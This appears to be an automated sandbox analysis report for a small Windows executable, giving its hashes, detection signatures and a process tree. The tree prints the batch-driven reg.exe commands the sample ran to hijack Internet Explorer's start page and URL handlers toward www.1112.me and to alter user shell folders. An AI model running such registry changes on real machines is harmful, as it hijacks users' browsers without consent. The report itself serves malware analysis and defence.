Overview

overview

3

Static

static

3

070ad6bd2f...18.exe

windows7-x64

1

070ad6bd2f...18.exe

windows10-2004-x64

1

Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    24/06/2024, 06:55

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    070ad6bd2fa0d3469ddd5205605e0abf_JaffaCakes118.exe

  • Size

    48KB

  • MD5

    070ad6bd2fa0d3469ddd5205605e0abf

  • SHA1

    3b4e026d9ad1d6b18d1f10872284bdb31774c301

  • SHA256

    d85fc099bd441b7bcacbf8e4461366113acbb54f33ffd7542408b08ea040c53e

  • SHA512

    f4b4f36851348a5a5ba834bdadb1538d2dc1f777c6bab84054a77360d3e80b01d111a22b94aaf18d085644ff1275498cf6a8ff0afa259340dfea39bfaf304876

  • SSDEEP

    768:U9J8NowRheD8/3rJiUqyet8w9abyzm5E50kyoVonvzRiZljBwiwo5sW3LhaNIC4x:U9wvQUreUbyzABq2mLha2OxEN

Score
1/10

Malware Config

Signatures

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies Internet Explorer start page 1 TTPs 1 IoCs
    stealer
  • Modifies data under HKEY_USERS 4 IoCs
  • Modifies registry class 12 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\070ad6bd2fa0d3469ddd5205605e0abf_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\070ad6bd2fa0d3469ddd5205605e0abf_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2244
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c C:\Users\Admin\AppData\Local\Temp\~D2A.bat "C:\Users\Admin\AppData\Local\Temp\070ad6bd2fa0d3469ddd5205605e0abf_JaffaCakes118.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2396
      • C:\Windows\SysWOW64\reg.exe
        reg delete "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /f
        3⤵
          PID:1756
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.1112.me/?yw" /f
          3⤵
          • Modifies Internet Explorer settings
          • Modifies Internet Explorer start page
          PID:2376
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKEY_USERs\.DEFAULT\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.1112.me/?yw" /f
          3⤵
          • Modifies data under HKEY_USERS
          PID:2388
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKEY_USERs\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.1112.me/?yw" /f
          3⤵
          • Modifies data under HKEY_USERS
          PID:1156
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" /v "" /d "C:\Program Files\Internet Explorer\IEXPLORE.EXE www.1112.me/?yw" /f
          3⤵
          • Modifies registry class
          PID:2380
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKEY_CLASSES_ROOT\HTTP\shell\open\command" /v "" /d "C:\Program Files\Internet Explorer\IEXPLORE.EXE www.1112.me/?yw" /f
          3⤵
          • Modifies registry class
          PID:2280
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" /v "" /d "C:\Program Files\Internet Explorer\IEXPLORE.EXE www.1112.me/?yw" /f
          3⤵
          • Modifies registry class
          PID:2612
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v "Favorites" /t REG_EXPAND_SZ /d "c:\Documents and Settings\Administrator\Favorites"
          3⤵
            PID:2600
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v "Personal" /t REG_EXPAND_SZ /d "c:\Documents and Settings\Administrator\My Documents"
            3⤵
              PID:2620

        Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\~D2A.bat
                Filesize

                1KB

                MD5

                6b1d7b12d453bd1eecb11c951973347f

                SHA1

                55e6f5018470b9041ebd70ed7d7c69d764c1cd9d

                SHA256

                8624d2e78872e385d249dc42c1893a04915eccc2e7e78e6f4b8fc7332a96c072

                SHA512

                1aa614fdbc5b15507f6b292cb50602014a842f9fbe62c1ce9e512e3d9ecd395c8fc61033ecb1fa860ea53924b18bd01d395123393863f72581faf3e5c61ef117

                Download Submit

              • memory/2244-3-0x0000000000400000-0x0000000000413000-memory.dmp

                Filesize

                76KB

                Download